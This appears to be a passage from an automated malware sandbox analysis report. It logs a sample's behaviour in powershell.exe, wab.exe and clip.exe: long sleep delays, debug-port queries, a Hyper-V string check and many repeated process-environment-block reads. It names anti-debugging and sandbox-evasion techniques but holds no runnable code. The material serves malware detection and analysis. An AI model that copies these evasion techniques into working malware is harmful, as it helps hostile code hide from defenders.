          Source: C:\Windows\SysWOW64\clip.exe TID: 6520Thread sleep time: -11258000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_021BB830 FindFirstFileW,FindNextFileW,FindClose,22_2_021BB830
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: wab.exe, wab.exe, 00000012.00000002.1866261345.0000000006A7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000002.00000002.1913978757.000002062DB4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438D1C0 rdtsc 22_2_0438D1C0
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0459D258 LdrInitializeThunk,LdrInitializeThunk,14_2_0459D258
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434A430 mov eax, dword ptr fs:[00000030h]22_2_0434A430
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430E420 mov eax, dword ptr fs:[00000030h]22_2_0430E420
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430E420 mov eax, dword ptr fs:[00000030h]22_2_0430E420
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430E420 mov eax, dword ptr fs:[00000030h]22_2_0430E420
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430C427 mov eax, dword ptr fs:[00000030h]22_2_0430C427
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04396420 mov eax, dword ptr fs:[00000030h]22_2_04396420
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04396420 mov eax, dword ptr fs:[00000030h]22_2_04396420
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04396420 mov eax, dword ptr fs:[00000030h]22_2_04396420
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04396420 mov eax, dword ptr fs:[00000030h]22_2_04396420
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04396420 mov eax, dword ptr fs:[00000030h]22_2_04396420
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04396420 mov eax, dword ptr fs:[00000030h]22_2_04396420
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04396420 mov eax, dword ptr fs:[00000030h]22_2_04396420
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04397410 mov eax, dword ptr fs:[00000030h]22_2_04397410
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04348402 mov eax, dword ptr fs:[00000030h]22_2_04348402
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04348402 mov eax, dword ptr fs:[00000030h]22_2_04348402
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04348402 mov eax, dword ptr fs:[00000030h]22_2_04348402
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433340D mov eax, dword ptr fs:[00000030h]22_2_0433340D
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E547F mov eax, dword ptr fs:[00000030h]22_2_043E547F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433A470 mov eax, dword ptr fs:[00000030h]22_2_0433A470
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433A470 mov eax, dword ptr fs:[00000030h]22_2_0433A470
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433A470 mov eax, dword ptr fs:[00000030h]22_2_0433A470
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04311460 mov eax, dword ptr fs:[00000030h]22_2_04311460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04311460 mov eax, dword ptr fs:[00000030h]22_2_04311460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04311460 mov eax, dword ptr fs:[00000030h]22_2_04311460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04311460 mov eax, dword ptr fs:[00000030h]22_2_04311460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04311460 mov eax, dword ptr fs:[00000030h]22_2_04311460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432F460 mov eax, dword ptr fs:[00000030h]22_2_0432F460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432F460 mov eax, dword ptr fs:[00000030h]22_2_0432F460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432F460 mov eax, dword ptr fs:[00000030h]22_2_0432F460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432F460 mov eax, dword ptr fs:[00000030h]22_2_0432F460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432F460 mov eax, dword ptr fs:[00000030h]22_2_0432F460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432F460 mov eax, dword ptr fs:[00000030h]22_2_0432F460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439C460 mov ecx, dword ptr fs:[00000030h]22_2_0439C460
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433245A mov eax, dword ptr fs:[00000030h]22_2_0433245A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430645D mov eax, dword ptr fs:[00000030h]22_2_0430645D
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CF453 mov eax, dword ptr fs:[00000030h]22_2_043CF453
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B440 mov eax, dword ptr fs:[00000030h]22_2_0431B440
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B440 mov eax, dword ptr fs:[00000030h]22_2_0431B440
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B440 mov eax, dword ptr fs:[00000030h]22_2_0431B440
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B440 mov eax, dword ptr fs:[00000030h]22_2_0431B440
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B440 mov eax, dword ptr fs:[00000030h]22_2_0431B440
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431B440 mov eax, dword ptr fs:[00000030h]22_2_0431B440
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E443 mov eax, dword ptr fs:[00000030h]22_2_0434E443
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043434B0 mov eax, dword ptr fs:[00000030h]22_2_043434B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043444B0 mov ecx, dword ptr fs:[00000030h]22_2_043444B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439A4B0 mov eax, dword ptr fs:[00000030h]22_2_0439A4B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043164AB mov eax, dword ptr fs:[00000030h]22_2_043164AB
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430B480 mov eax, dword ptr fs:[00000030h]22_2_0430B480
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04319486 mov eax, dword ptr fs:[00000030h]22_2_04319486
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04319486 mov eax, dword ptr fs:[00000030h]22_2_04319486
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043104E5 mov ecx, dword ptr fs:[00000030h]22_2_043104E5
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043B94E0 mov eax, dword ptr fs:[00000030h]22_2_043B94E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E54DB mov eax, dword ptr fs:[00000030h]22_2_043E54DB
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434D530 mov eax, dword ptr fs:[00000030h]22_2_0434D530
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434D530 mov eax, dword ptr fs:[00000030h]22_2_0434D530
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431D534 mov eax, dword ptr fs:[00000030h]22_2_0431D534
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431D534 mov eax, dword ptr fs:[00000030h]22_2_0431D534
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431D534 mov eax, dword ptr fs:[00000030h]22_2_0431D534
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431D534 mov eax, dword ptr fs:[00000030h]22_2_0431D534
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431D534 mov eax, dword ptr fs:[00000030h]22_2_0431D534
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431D534 mov eax, dword ptr fs:[00000030h]22_2_0431D534
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320535 mov eax, dword ptr fs:[00000030h]22_2_04320535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320535 mov eax, dword ptr fs:[00000030h]22_2_04320535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320535 mov eax, dword ptr fs:[00000030h]22_2_04320535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320535 mov eax, dword ptr fs:[00000030h]22_2_04320535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320535 mov eax, dword ptr fs:[00000030h]22_2_04320535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04320535 mov eax, dword ptr fs:[00000030h]22_2_04320535
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E5537 mov eax, dword ptr fs:[00000030h]22_2_043E5537
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E53E mov eax, dword ptr fs:[00000030h]22_2_0433E53E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E53E mov eax, dword ptr fs:[00000030h]22_2_0433E53E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E53E mov eax, dword ptr fs:[00000030h]22_2_0433E53E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E53E mov eax, dword ptr fs:[00000030h]22_2_0433E53E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E53E mov eax, dword ptr fs:[00000030h]22_2_0433E53E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CB52F mov eax, dword ptr fs:[00000030h]22_2_043CB52F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043BF525 mov eax, dword ptr fs:[00000030h]22_2_043BF525
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04347505 mov eax, dword ptr fs:[00000030h]22_2_04347505
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04347505 mov ecx, dword ptr fs:[00000030h]22_2_04347505
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E4500 mov eax, dword ptr fs:[00000030h]22_2_043E4500
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434B570 mov eax, dword ptr fs:[00000030h]22_2_0434B570
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434B570 mov eax, dword ptr fs:[00000030h]22_2_0434B570
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430B562 mov eax, dword ptr fs:[00000030h]22_2_0430B562
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434656A mov eax, dword ptr fs:[00000030h]22_2_0434656A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434656A mov eax, dword ptr fs:[00000030h]22_2_0434656A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434656A mov eax, dword ptr fs:[00000030h]22_2_0434656A
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04318550 mov eax, dword ptr fs:[00000030h]22_2_04318550
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04318550 mov eax, dword ptr fs:[00000030h]22_2_04318550
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A35BA mov eax, dword ptr fs:[00000030h]22_2_043A35BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A35BA mov eax, dword ptr fs:[00000030h]22_2_043A35BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A35BA mov eax, dword ptr fs:[00000030h]22_2_043A35BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043A35BA mov eax, dword ptr fs:[00000030h]22_2_043A35BA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043CF5BE mov eax, dword ptr fs:[00000030h]22_2_043CF5BE
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043345B1 mov eax, dword ptr fs:[00000030h]22_2_043345B1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043345B1 mov eax, dword ptr fs:[00000030h]22_2_043345B1
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433F5B0 mov eax, dword ptr fs:[00000030h]22_2_0433F5B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315A9 mov eax, dword ptr fs:[00000030h]22_2_043315A9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315A9 mov eax, dword ptr fs:[00000030h]22_2_043315A9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315A9 mov eax, dword ptr fs:[00000030h]22_2_043315A9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315A9 mov eax, dword ptr fs:[00000030h]22_2_043315A9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315A9 mov eax, dword ptr fs:[00000030h]22_2_043315A9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043905A7 mov eax, dword ptr fs:[00000030h]22_2_043905A7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043905A7 mov eax, dword ptr fs:[00000030h]22_2_043905A7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043905A7 mov eax, dword ptr fs:[00000030h]22_2_043905A7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E59C mov eax, dword ptr fs:[00000030h]22_2_0434E59C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439B594 mov eax, dword ptr fs:[00000030h]22_2_0439B594
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439B594 mov eax, dword ptr fs:[00000030h]22_2_0439B594
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04312582 mov eax, dword ptr fs:[00000030h]22_2_04312582
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04312582 mov ecx, dword ptr fs:[00000030h]22_2_04312582
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04344588 mov eax, dword ptr fs:[00000030h]22_2_04344588
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430758F mov eax, dword ptr fs:[00000030h]22_2_0430758F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430758F mov eax, dword ptr fs:[00000030h]22_2_0430758F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430758F mov eax, dword ptr fs:[00000030h]22_2_0430758F
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315F4 mov eax, dword ptr fs:[00000030h]22_2_043315F4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315F4 mov eax, dword ptr fs:[00000030h]22_2_043315F4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315F4 mov eax, dword ptr fs:[00000030h]22_2_043315F4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315F4 mov eax, dword ptr fs:[00000030h]22_2_043315F4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315F4 mov eax, dword ptr fs:[00000030h]22_2_043315F4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043315F4 mov eax, dword ptr fs:[00000030h]22_2_043315F4
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043125E0 mov eax, dword ptr fs:[00000030h]22_2_043125E0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0433E5E7 mov eax, dword ptr fs:[00000030h]22_2_0433E5E7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434C5ED mov eax, dword ptr fs:[00000030h]22_2_0434C5ED
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434C5ED mov eax, dword ptr fs:[00000030h]22_2_0434C5ED
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043165D0 mov eax, dword ptr fs:[00000030h]22_2_043165D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434A5D0 mov eax, dword ptr fs:[00000030h]22_2_0434A5D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434A5D0 mov eax, dword ptr fs:[00000030h]22_2_0434A5D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438D5D0 mov eax, dword ptr fs:[00000030h]22_2_0438D5D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438D5D0 mov ecx, dword ptr fs:[00000030h]22_2_0438D5D0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E35D7 mov eax, dword ptr fs:[00000030h]22_2_043E35D7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E35D7 mov eax, dword ptr fs:[00000030h]22_2_043E35D7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E35D7 mov eax, dword ptr fs:[00000030h]22_2_043E35D7
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043395DA mov eax, dword ptr fs:[00000030h]22_2_043395DA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043455C0 mov eax, dword ptr fs:[00000030h]22_2_043455C0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E55C9 mov eax, dword ptr fs:[00000030h]22_2_043E55C9
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E5CF mov eax, dword ptr fs:[00000030h]22_2_0434E5CF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434E5CF mov eax, dword ptr fs:[00000030h]22_2_0434E5CF
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043E5636 mov eax, dword ptr fs:[00000030h]22_2_043E5636
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04346620 mov eax, dword ptr fs:[00000030h]22_2_04346620
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04348620 mov eax, dword ptr fs:[00000030h]22_2_04348620
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432E627 mov eax, dword ptr fs:[00000030h]22_2_0432E627
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430F626 mov eax, dword ptr fs:[00000030h]22_2_0430F626
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0431262C mov eax, dword ptr fs:[00000030h]22_2_0431262C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04313616 mov eax, dword ptr fs:[00000030h]22_2_04313616
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04313616 mov eax, dword ptr fs:[00000030h]22_2_04313616
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04352619 mov eax, dword ptr fs:[00000030h]22_2_04352619
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0438E609 mov eax, dword ptr fs:[00000030h]22_2_0438E609
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04341607 mov eax, dword ptr fs:[00000030h]22_2_04341607
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434F603 mov eax, dword ptr fs:[00000030h]22_2_0434F603
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432260B mov eax, dword ptr fs:[00000030h]22_2_0432260B
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04342674 mov eax, dword ptr fs:[00000030h]22_2_04342674
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D866E mov eax, dword ptr fs:[00000030h]22_2_043D866E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043D866E mov eax, dword ptr fs:[00000030h]22_2_043D866E
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434A660 mov eax, dword ptr fs:[00000030h]22_2_0434A660
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434A660 mov eax, dword ptr fs:[00000030h]22_2_0434A660
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04349660 mov eax, dword ptr fs:[00000030h]22_2_04349660
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04349660 mov eax, dword ptr fs:[00000030h]22_2_04349660
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0432C640 mov eax, dword ptr fs:[00000030h]22_2_0432C640
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043076B2 mov eax, dword ptr fs:[00000030h]22_2_043076B2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043076B2 mov eax, dword ptr fs:[00000030h]22_2_043076B2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043076B2 mov eax, dword ptr fs:[00000030h]22_2_043076B2
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_043466B0 mov eax, dword ptr fs:[00000030h]22_2_043466B0
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0434C6A6 mov eax, dword ptr fs:[00000030h]22_2_0434C6A6
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430D6AA mov eax, dword ptr fs:[00000030h]22_2_0430D6AA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0430D6AA mov eax, dword ptr fs:[00000030h]22_2_0430D6AA
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04314690 mov eax, dword ptr fs:[00000030h]22_2_04314690
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_04314690 mov eax, dword ptr fs:[00000030h]22_2_04314690
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439368C mov eax, dword ptr fs:[00000030h]22_2_0439368C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439368C mov eax, dword ptr fs:[00000030h]22_2_0439368C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439368C mov eax, dword ptr fs:[00000030h]22_2_0439368C
          Source: C:\Windows\SysWOW64\clip.exeCode function: 22_2_0439368C mov eax, dword ptr fs:[00000030h]22_2_0439368C
